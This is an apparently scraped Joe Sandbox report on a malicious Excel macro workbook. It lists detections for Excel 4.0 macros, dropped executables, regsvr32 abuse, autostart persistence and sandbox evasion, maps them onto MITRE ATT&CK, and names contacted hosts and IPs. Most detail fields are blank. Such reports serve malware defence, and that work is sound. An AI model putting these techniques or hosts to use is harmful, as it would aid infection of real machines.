Analysis Report Documents_13134976_1377491379.xlsb
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: Regsvr32 Anomaly | Show sources |
Source: | Author: Florian Roth, oscd.community: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Uses ping.exe to check the status of other devices and networks | Show sources |
Source: | Process created: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Dropped File: | ||
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | File read: | Jump to behavior |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Creates an autostart registry key pointing to binary in C:\Windows | Show sources |
Source: | Registry value created or modified: | Jump to behavior |
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Uses ping.exe to sleep | Show sources |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: | Network Connect: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File source: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Code function: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder11 | Process Injection112 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | DLL Side-Loading1 | Registry Run Keys / Startup Folder11 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Virtualization/Sandbox Evasion11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | Remote System Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery24 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | Metadefender | Browse | ||
4% | ReversingLabs | |||
6% | Metadefender | Browse | ||
4% | ReversingLabs | |||
6% | Metadefender | Browse | ||
4% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
tpfcu.com | 107.180.50.232 | true | false | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
8.8.7.7 | unknown | United States | 15169 | GOOGLEUS | false | |
107.180.50.232 | tpfcu.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false | |
18.117.84.120 | unknown | United States | 3 | MIT-GATEWAYSUS | true |
Private |
---|
IP |
---|
192.168.2.1 |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 431937 |
Start date: | 09.06.2021 |
Start time: | 15:20:54 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Documents_13134976_1377491379.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLSB@28/13@1/4 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
15:22:03 | API Interceptor | |
15:22:35 | Autostart | |
15:22:43 | Autostart |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
18.117.84.120 | Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
MIT-GATEWAYSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8916410db85077a5460817142dcbc8de | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
